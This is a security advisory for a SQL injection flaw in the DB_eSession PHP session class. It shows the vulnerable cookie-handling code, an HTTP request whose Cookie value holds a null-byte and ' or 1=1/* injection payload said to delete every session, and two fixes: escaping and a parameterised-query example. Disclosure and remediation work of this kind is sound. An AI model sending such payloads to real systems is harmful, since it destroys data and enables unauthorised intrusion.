DB_eSession deleteSession() SQL injection
February 11, 2022
Vendor : Lawrence Osiris
Version : DB_eSession <= 1.0.2
Risk : SQL Injection

DB_eSession is a feature-packed PHP class that stores session data in a MySQL database rather than in files. It is powerful, designed with security in mind, and easy to use. The DB_eSession library is used in a number of popular web applications and private projects alike. DB_eSession is vulnerable to SQL injection because cookie data is used unsafely in an SQL query, which allows an attacker to craft malicious SQL queries and have them executed.

SQL Injection:
There is an SQL injection vulnerability in DB_eSession that allows an attacker to perform pre-authentication SQL injection attacks against the vulnerable web application.

// Try and save the current session ID if one is defined already.
if (isSet($_COOKIE[$this->_sess_name]))
   $_sess_id_set = $_COOKIE[$this->_sess_name];
elseif (isSet($GLOBALS[$this->_sess_name]))
   $_sess_id_set = $GLOBALS[$this->_sess_name];
else
   $_sess_id_set = NULL;

The above code is from the DB_eSession class at lines 1080 - 1090. The variable $this->_sess_name is in most cases PHPSESSID, or is set to a developer-specified value; you should be able to tell by looking at your cookies.

GET /example/index.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: example=143263645564654563456345634563435%00' or 1=1/*

The above request would delete all of the sessions in the database. The null byte is there to get past the check that makes the application die at line 1134. Depending on the version of MySQL in use, other attacks may be possible. The root of this problem is that untrusted data is taken from a cookie value and passed to the deleteSession() function, where it is used in an SQL query.

The vendor was unresponsive to my contact attempts, but a fix is not too difficult: at line 1092, add the following code below the code shown at lines 1080 - 1090.

// Escape the cookie- or global-supplied session ID before deleteSession() uses it in SQL.
$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);

This should effectively stop any SQL Injection attacks against the vulnerable DB_eSession class.
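As an added example (not DB_eSession's code, and a different technique from the addslashes() fix above), the following PHP rejects any cookie value that does not look like a session ID and binds the ID as a parameter so it is never interpolated into the DELETE. The sessions table, its columns and the SQLite stand-in for MySQL are assumptions so the script runs offline.

```php
<?php
// Added example, not part of DB_eSession: allow-list the cookie-supplied
// session ID, then delete with a bound parameter instead of string building.
// Table name, column names and the SQLite handle are assumptions.

// PHP session IDs are built from [0-9a-zA-Z,-]; anything else, including the
// null byte and quote in the advisory's cookie value, is rejected before SQL.
function validate_session_id(?string $id): ?string
{
    if ($id === null || $id === '') {
        return null;
    }
    return preg_match('/^[0-9a-zA-Z,-]{1,128}$/', $id) === 1 ? $id : null;
}

// Hardened deleteSession(): the ID is passed as a parameter, never concatenated.
function deleteSession(PDO $db, ?string $id): int
{
    $id = validate_session_id($id);
    if ($id === null) {
        return 0; // invalid or missing ID: nothing to delete, nothing to query
    }
    $stmt = $db->prepare('DELETE FROM sessions WHERE sess_id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->rowCount();
}

// Constructed in-memory table with two sessions (SQLite stands in for MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sessions (sess_id TEXT PRIMARY KEY, data TEXT)');
$db->exec("INSERT INTO sessions VALUES ('abc123', 'a'), ('def456', 'b')");

// The cookie value from the advisory: a null byte followed by a tautology.
// validate_session_id() rejects it, so no statement is issued at all.
$malicious = "143263645564654563456345634563435\0' or 1=1/*";
$deleted = deleteSession($db, $malicious);
echo "malicious cookie deleted $deleted row(s)\n";

// A well-formed ID is accepted and deletes exactly its own row.
$deleted = deleteSession($db, 'abc123');
echo "legitimate ID deleted $deleted row(s)\n";

$remaining = (int) $db->query('SELECT COUNT(*) FROM sessions')->fetchColumn();
echo "$remaining session(s) remain\n";
```

The allow-list check rejects the null byte and the quote before any database code runs, so it does not depend on which characters the escaping routine or the MySQL connection charset happens to handle.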

James Bercegay of the GulfTech Security Research Team